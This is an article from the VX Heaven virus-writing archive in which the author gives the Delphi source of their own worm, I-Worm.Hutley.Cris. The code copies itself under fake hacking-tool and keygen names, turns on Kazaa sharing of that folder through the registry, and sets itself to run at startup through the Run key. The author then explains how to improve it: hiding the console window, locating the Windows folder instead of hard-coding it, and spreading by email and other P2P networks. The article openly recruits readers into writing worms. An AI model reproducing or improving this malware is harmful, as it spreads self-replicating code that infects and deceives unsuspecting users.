VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Simple worm in delphi and corrections

Ready Rangers Liberation Front [7]
July 2006

[Back to index] [Comments]


Here I will go to explain to you the code of my first worm. Totaly written in Delphi. It was my first creation of type worm, because since then I had made only one Trojan and a creator of backdoors for mirc. As I wise person very as well as would not have to be one worm, I was programming it in accordance with some things that I already had made with the Legionário Trojan - my first creation for world vx. After programmed and distributed, I decided to publish the code to have the opinion of other people who were more the time in the branch of that I.

At that time, I was in another group (GEDZAC), then I asked for aid to the other members so that they evaluated my code and they pointed me the errors.

The result was excellent. Those mans (MachineDramon, Falckon, Sr.Muerte, Pana_Infierno, DemionKlaz, and others), they had had spectacular a good will in saying me where i committed errors and which the certain method of if making so that mine worm did not lose its effectiveness.

The source code

program porn;


{       I-Worm.Hutley.Cris
        Brasil! Rulez! }

// Please KAV Lab. this is I-Worm.Hutley.Cris
// it's the original name! Understand?
        Windows, SysUtils, Registry;

procedure ExecutaViaRegistro(nome, path: string);
var evrg: TRegistry;
        evrg := TRegistry.Create;
        evrg.RootKey := HKEY_LOCAL_MACHINE;
        evrg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE);
        evrg.WriteString(nome, path);

procedure Kazaa;
var reg: Tregistry;
        Cris: array[0..260] of Char;
        reg := TRegistry.Create;
        reg.RootKey := HKEY_CURRENT_USER;
        reg.OpenKey('Software\Kazaa\LocalContent', True);
        reg.WriteString('DisableSharing', '0');
        reg.writestring('dir0', '012345:' + 'C:\Windows\files');
        reg.writestring('dir1', '012345:' + 'C:\Windows\files');
        reg.writestring('dir2', '012345:' + 'C:\Windows\files');
        reg.writestring('dir3', '012345:' + 'C:\Windows\files');
        reg.writestring('dir4', '012345:' + 'C:\Windows\files');
        reg.writestring('dir5', '012345:' + 'C:\Windows\files');
        CreateDirectory('C:\windows\files', nil);
        GetModuleFileNameA(0, Cris, SizeOf(Cris));
        CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\hotmail_cracker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\hotmail_account_sniffer.exe', True);
        CopyFile(Cris, 'C:\Windows\files\aim_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\msn_crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\icq_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WarDialer.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 6 - Serial Gen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WinxpHack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 7 Crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\win2k_serial_gen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\yahoo_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\ftp_crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\XP_keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\PS2_emulator_bleem.exe', True);
        CopyFile(Cris, 'C:\Windows\files\win2k_pass_decryptor.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Win2k_reboot_exploit.exe', True);
        CopyFile(Cris, 'C:\Windows\files\IIS_ShellBind.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WinZip_KeyGen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Counter Strike_CD_Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 2005 Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 9 Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Half_life Cd keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Hotmail Hacker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\ICQ_Hackingtools.exe', True);
        CopyFile(Cris, 'C:\Windows\files\invisible_IP.exe', True);

        Cris: array[0..260] of Char;
        GetModuleFileNameA(0, Cris, SizeOf(Cris));
        if not (FileExists('C:\Windows\WinExec.exe')) then
                CopyFile(Cris, 'C:\Windows\WinExec.exe', True);
                ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
        end else
                ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');

An explanation

What this worm makes is only if auto to copy for a folder created for he himself. When it is copied using several other names, it it has access to the register of the system and makes with that this folder is shared by the KAZAA. It also creates only one copy of itself in the folder of windows, and writes in the register so that all time is executed that windows will be initiated.

The correction


This stretch, in Delphi, is called "directive compilation". Removing this directive one, it makes with that the window console does not appear. The correct one is to remove it

2 - CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True);

This line of command possesss a good idea, but its effectiveness is engaged.

For two reasons it is engaged. First - It copies itself for a folder that will be add as shared for the KAZAA, this implies where, if the user will not have the KAZAA worm will not go to spread itself. Second - as you already must have noticed, the complete way of the archive already you are placed, this you compromise worm if the user will have windows installed for example in unit E:.

The way to kill these two problems would be, to place the auto possibility of if also propagating for email and other programs of P2P. How much to the problem of the complete way, it is necessary to add to the code a function that will go to return the folder from windows, ai is enough to add "files\hotmail_hacker.exe" and ready, this problem is decided. It sees the function that returns the folder from windows.

function WinDir: string;
  SetLength(Result, MAX_PATH);
  Windows.GetWindowsDirectory(PChar(Result), MAX_PATH);
  Result := string(PChar(Result)) + '\';

With this function in the code, that one same line of command would be thus:

CopyFile(Cris, WinDir + 'files\hotmail_hacker.exe', True);

The same thing if applies the commands:

reg.writestring('dir0', '012345:' + 'C:\Windows\files');

and too the:

ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');

The end

These are the biggest problems of this worm basic that one day I broke the head to develop. I wait to have helped in the initiation of plus some coders for this wonderful world that is of the creation of virus/worms/trojans.

With world vx diminishing each time more, I believe to be important to make beginning basic articles for with a language of easy learning and high level as delphi is.

This is all staff.

Suggestions, critics: [email protected] -

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka